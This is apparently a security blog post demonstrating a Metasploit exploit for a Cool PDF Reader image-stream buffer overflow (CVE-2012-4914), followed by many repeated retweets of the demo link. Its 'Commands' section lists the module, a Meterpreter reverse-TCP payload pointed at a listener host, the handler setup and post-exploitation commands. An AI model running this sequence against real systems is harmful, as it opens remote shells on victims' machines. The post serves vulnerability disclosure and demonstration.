Timeline :
Vulnerability discovered and reported to Secunia by Francis Provencher the 2012-12-19
Vulnerability publicly disclosed by Francis Provencher the 2013-01-18
Metasploit PoC provided the 2013-03-17
PoC provided by :
Francis Provencher
Chris Gabriel
juan vazquez
Reference(s) :
Affected version(s) :
Cool PDF Reader equal or prior to version 3.0.2.256
Tested on Windows XP Pro SP3 with :
Cool PDF Reader 3.0.2.256
Description :
This module exploits a stack buffer overflow in Cool PDF Reader equal or prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.
Commands :
use exploit/windows/fileformat/coolpdf_image_stream_bof set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit -j sysinfo getuid
RT @KDTechNews: CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/70cXX3YfAL http://t.co/C6byVgaZot
RT @Hfuhs2013CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo – http://t.co/o4W5NDgmya: CVE-2012-4914 Cool PDF Ima…
RT @Hfuhs: CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo – http://t.co/9SB2lC2Ibj
CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo – http://t.co/9SB2lC2Ibj
RT @KDTechNews2013CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/vcQSBYxFff http://t.co/g7PuFJYaFn: …
CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/70cXX3YfAL http://t.co/C6byVgaZot
RT @eromang: CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/sgawFsjKLN
RT @eromang: CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/sgawFsjKLN
CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo: http://t.co/OfMs1NbaFG #infosec #metasploit
RT @twihateb2013CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo
B! http://t.co/WtKc1eRlZD
#twihateb: CVE-2012-491…
RT @eromang: CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/sgawFsjKLN
CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo
B! http://t.co/P21tZvyMND
#twihateb
RT @eromang2013CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/7MZERw0j6C: CVE-2012-4914 Cool PDF Ima…
RT @eromang: CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo http://t.co/sgawFsjKLN